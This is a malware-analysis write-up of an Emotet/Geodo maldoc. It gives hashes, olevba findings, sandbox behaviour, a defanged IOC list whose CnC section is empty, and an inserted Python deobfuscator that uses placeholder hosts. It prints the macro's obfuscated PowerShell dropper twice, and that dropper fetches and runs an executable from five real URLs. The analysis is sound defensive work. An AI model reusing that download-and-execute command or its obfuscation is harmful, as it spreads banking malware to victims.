MalDoc Analysis – Geodo


Geodo/Emotet is a banking Trojan that is distributed via malspam emails. It is part of the Feodo family.

The sender of the emails appears to be someone the recipient may know, or someone internal to the recipient's organisation, and the subject line usually includes words like Invoice, Payment Notice or Purchase.

Following is an email received.

The link provided in the email leads to the download of the malicious Word document. This document contains a macro (dropper) which, once macros are enabled, attempts to connect to each of the payload URLs in turn to download the executable payload. After the executable has been invoked, it attempts to connect to a list of CnC IPs for CnC communication.

Tools:
Process Hacker
Fiddler
PEStudio
OLETools

Report.doc is the maldoc sample which we will be analyzing.

Size: 146 KB
MD5: 7158cd5e6e60d712bafe4b5c283a094a
SHA256: 30031fb352b8c753ca5aa8756a67435f19f94046fac589724d2a41fd162012b2

Static Analysis

Submitting the doc file to VirusTotal, it is observed that various engines have marked it as malicious, categorizing it as a Trojan Downloader.

olevba is part of the python-oletools package and allows us to detect and extract VBA macros and detect suspicious patterns.

Using olevba, we can see there are various streams, including macro streams. We observe that the macro code is obfuscated.

olevba also gives us a table listing suspicious properties such as obfuscation, reversed strings, Base64-encoded strings, auto-open triggers and executable calls.

Behavioral Analysis

Step 1 – Finding a list of Payload URL’s

Disable the internet connection of the virtual machine. The reason we have disabled internet is so the maldoc tries connecting to each of its payload URLs. Maldocs used for Geodo distribution have a list of 5 payload URLs. Failing to connect to one, it will attempt to connect to the next in the list.

Keep Fiddler running – Fiddler will intercept any HTTP Traffic.

After opening Report.doc, we enable macros.

It is then observed in Process Hacker that winword.exe calls cmd.exe, which then calls powershell.exe.

We can then see the properties of the powershell.exe process.

Looking at the command line information, it is observed that an obfuscated script is passed to powershell.exe as its argument.

powershell  "(('yT'+'G'+'nsadasd '+'= &('+'aUXnaU'+'X+'+'aU'+'XeaUX+aU'+'X'+'w-o'+'bj'+'ec'+'aUX+'+'a'+'U'+'XtaUX) ran'+'d'+'om;yT'+'GYYU = .(aU'+'Xn'+'eaUX+'+'a'+'U'+'XwaU'+'X'+'+'+'aUX-obje'+'ct'+'aUX) S'+'ys'+'tem.Net.W'+'ebC'+'li'+'ent'+';'+'y'+'TGNSB = yTG'+'ns'+'ada'+'sd.n'+'ext'+'(10000, '+'282'+'1'+'3'+'3);'+'yTG'+'AD'+'CX'+' ='+' '+'aUX '+' '+'ht'+'tp:'+'/'+'/burak.me.u'+'k/rsVS/'+'@ht'+'tp:'+'//'+'d'+'i'+'n'+'ge'+'s'+'gang'+'.'+'co'+'m/yZCL'+'T'+'O/@http'+'://brcom.'+'de/3x2c/'+'@http'+'://e'+'a'+'s'+'yda'+'t'+'a.gr/szTMN'+'v/@'+'h'+'ttp'+':/'+'/bakino'+'.com'+'/3'+'J'+'6mS'+'/'+'aUX.S'+'plit('+'a'+'UX'+'@a'+'UX);yTG'+'SD'+'C '+'='+' yTGen'+'v:pu'+'b'+'lic '+'+ '+'aUXT4KaU'+'X + '+'yT'+'GN'+'SB + (aUX.ex'+'aU'+'X+aUXea'+'UX'+')'+';for'+'e'+'ac'+'h('+'y'+'TGasfc '+'in'+' yTGAD'+'CX'+'){try{yTGYYU'+'.esyDotJT'+'W'+'nltJ'+'TOa'+'dFItJTlee'+'s'+'y'+'(yTG'+'asfc'+'.esy'+'ToStrtJ'+'TitJT'+'Ngesy()'+','+' y'+'TGSDC)'+';'+'&(aUXIn'+'voaU'+'X+'+'aUXkaUX'+'+a'+'UXe-It'+'emaUX)'+'('+'yTG'+'SDC)'+';b'+'rea'+'k;}ca'+'tch{'+'}}')-CrePLACe'yTG',[cHaR]36  -REPlaCe'aUX',[cHaR]39-REPlaCe'tJT',[cHaR]96 -REPlaCe  'T4K',[cHaR]92-CrePLACe 'esy',[cHaR]34) | .( $pshoMe[4]+$pshome[30]+'X')

Analyzing the obfuscated code, it is seen that the script is built from many short string fragments concatenated with '+'.

Removing the '+' concatenations, we then get some human-readable code:

powershell  "(('yTGnsadasd = &(aUXnaUX+aUXeaUX+aUXw-objecaUX+aUXtaUX) random;yTGYYU = .(aUXneaUX+aUXwaUX+aUX-objectaUX) System.Net.WebClient;yTGNSB = yTGnsadasd.next(10000, 282133);yTGADCX = aUX  http://burak.me.uk/rsVS/@http://dingesgang.com/yZCLTO/@http://brcom.de/3x2c/@http://easydata.gr/szTMNv/@http://bakino.com/3J6mS/aUX.Split(aUX@aUX);yTGSDC = yTGenv:public + aUXT4KaUX + yTGNSB + (aUX.exaUX+aUXeaUX);foreach(yTGasfc in yTGADCX){try{yTGYYU.esyDotJTWnltJTOadFItJTleesy(yTGasfc.esyToStrtJTitJTNgesy(), yTGSDC);&(aUXInvoaUX+aUXkaUX+aUXe-ItemaUX)(yTGSDC);break;}catch{}}')-CrePLACe'yTG',[cHaR]36  -REPlaCe'aUX',[cHaR]39-REPlaCe'tJT',[cHaR]96 -REPlaCe  'T4K',[cHaR]92-CrePLACe 'esy',[cHaR]34) | .( $pshoMe[4]+$pshome[30]+'X')

Thus the de-obfuscated PowerShell code has five URLs:
hxxp://burak.me.uk/rsVS/
hxxp://dingesgang.com/yZCLTO/
hxxp://brcom.de/3x2c/
hxxp://easydata.gr/szTMNv/
hxxp://bakino.com/3J6mS/
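The two manual steps above (dropping the '+' glue, then applying the command's own -replace chain) can be scripted so the payload list is recovered and defanged automatically. This is an added example, not code from the original post; the token-to-character mapping is taken from the command shown above, while the input string is a constructed stand-in with the same obfuscation scheme but made-up *.invalid hosts instead of the real payload URLs.

```python
import re

# Token -> character code, taken from the -replace chain at the end of the
# command shown on the page: yTG -> $, aUX -> ', tJT -> `, T4K -> \, esy -> "
TOKEN_MAP = {"yTG": 36, "aUX": 39, "tJT": 96, "T4K": 92, "esy": 34}

# Constructed stand-in for the page's command: same obfuscation scheme
# (fragments glued with '+' and placeholder tokens), but the payload URLs
# are made-up *.invalid hosts, not the real ones from the sample.
OBFUSCATED = (
    "yT'+'Gnsadasd '+'= &('+'aUXnaU'+'X+'+'aU'+'XeaUX+aU'+'X'+'w-o'+'bj'+'ec'+'aUX+'+'a'+'U'+'XtaUX) ran'+'d'+'om;"
    "yTGYYU = .(aU'+'Xn'+'eaUX+'+'a'+'U'+'XwaU'+'X'+'+'+'aUX-obje'+'ct'+'aUX) System.Net.WebClient;"
    "yTGNSB = yTGnsadasd.next(10000, 282133);"
    "yTGADCX = aUX  ht'+'tp://payload-one.invalid/aaa/@http'+'://payload-two.invalid/bbb/"
    "@http://payload-three.invalid/ccc/aUX.S'+'plit(aUX@aUX);"
    "yTGSDC = yTGenv:public + aUXT4KaUX + yTGNSB + (aUX.exaUX+aUXeaUX);"
    "foreach(yTGasfc in yTGADCX){try{yTGYYU.esyDotJTWnltJTOadFItJTleesy(yTGasfc.esyToStrtJTitJTNgesy(), yTGSDC);"
    "&(aUXInvoaUX+aUXkaUX+aUXe-ItemaUX)(yTGSDC);break;}catch{}}"
)

def join_fragments(s: str) -> str:
    """Step 1 from the post: drop the '+' glue so the fragments read as one literal."""
    return s.replace("'+'", "")

def substitute_tokens(s: str) -> str:
    """Step 2: apply the command's own -replace chain. The tokens occur only in
    this exact case in the sample, so a plain replace gives PowerShell's result."""
    for token, code in TOKEN_MAP.items():
        s = s.replace(token, chr(code))
    return s

def deobfuscate(s: str) -> str:
    return substitute_tokens(join_fragments(s))

def extract_payload_urls(deobfuscated: str) -> list:
    """Pull the '@'-separated URL list that feeds .Split('@'), defanged for reporting."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", deobfuscated)
    if not m:
        return []
    urls = [u.strip() for u in m.group(1).split("@") if u.strip()]
    return [u.replace("http", "hxxp", 1) for u in urls]

if __name__ == "__main__":
    clear = deobfuscate(OBFUSCATED)
    print(clear)
    for url in extract_payload_urls(clear):
        print(url)
```

The recovered script also shows the drop location: $env:public plus a random number and .exe, which is what the WebClient DownloadFile call writes before Invoke-Item runs it.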

This is further verified when we look at the output in Fiddler.

Fiddler has intercepted requests to those same 5 URLs, in the same order they appear in the PowerShell code.

Step 2 – Finding a list of CnC URLs

Visiting hxxp://bakino.com/3J6mS/ manually gives us the download of an executable named 78406.exe. We could have rerun the maldoc and let its PowerShell download the executable, but then it would initiate the connection to a single CnC IP and we would not get its entire list. To get the entire list, the payload is executed with the internet connection of the VM disconnected.

Size: 232 KB
MD5: EE1F9803CB1EA4BD44B5E44665ED4D23
SHA256: 29F4F2BAD8B1D2701A301D852F5649E25F8FACBBC3C9C68B2936DDD6139F5899

Submitting the payload file to VirusTotal, it is observed that various engines have marked it as malicious.

Opening the executable in PEStudio, many observations are made:

  • It is detected as a fake Microsoft executable
  • It has a high detection rate on VirusTotal
  • Many sections are blacklisted
  • The compiler timestamp year is reported as 2028 (Back to the Future?)

On executing the payload (78406.exe), Windows moved it to C:\Users\<UserName>\AppData\Local\Microsoft\Windows\ and renamed it to tipsharpen.exe.

tipsharpen.exe will then execute from the AppData Folder.

On observing its process in Process Hacker, it is seen that it tries to pass itself off as an executable developed by Microsoft.

Since there is no internet connectivity, tipsharpen.exe then attempts to connect to multiple CnCs, looping over its CnC list.

IOCs

Payload

hxxp://burak.me.uk/rsVS/
hxxp://dingesgang.com/yZCLTO/
hxxp://brcom.de/3x2c/
hxxp://easydata.gr/szTMNv/
hxxp://bakino.com/3J6mS/

Command and Control

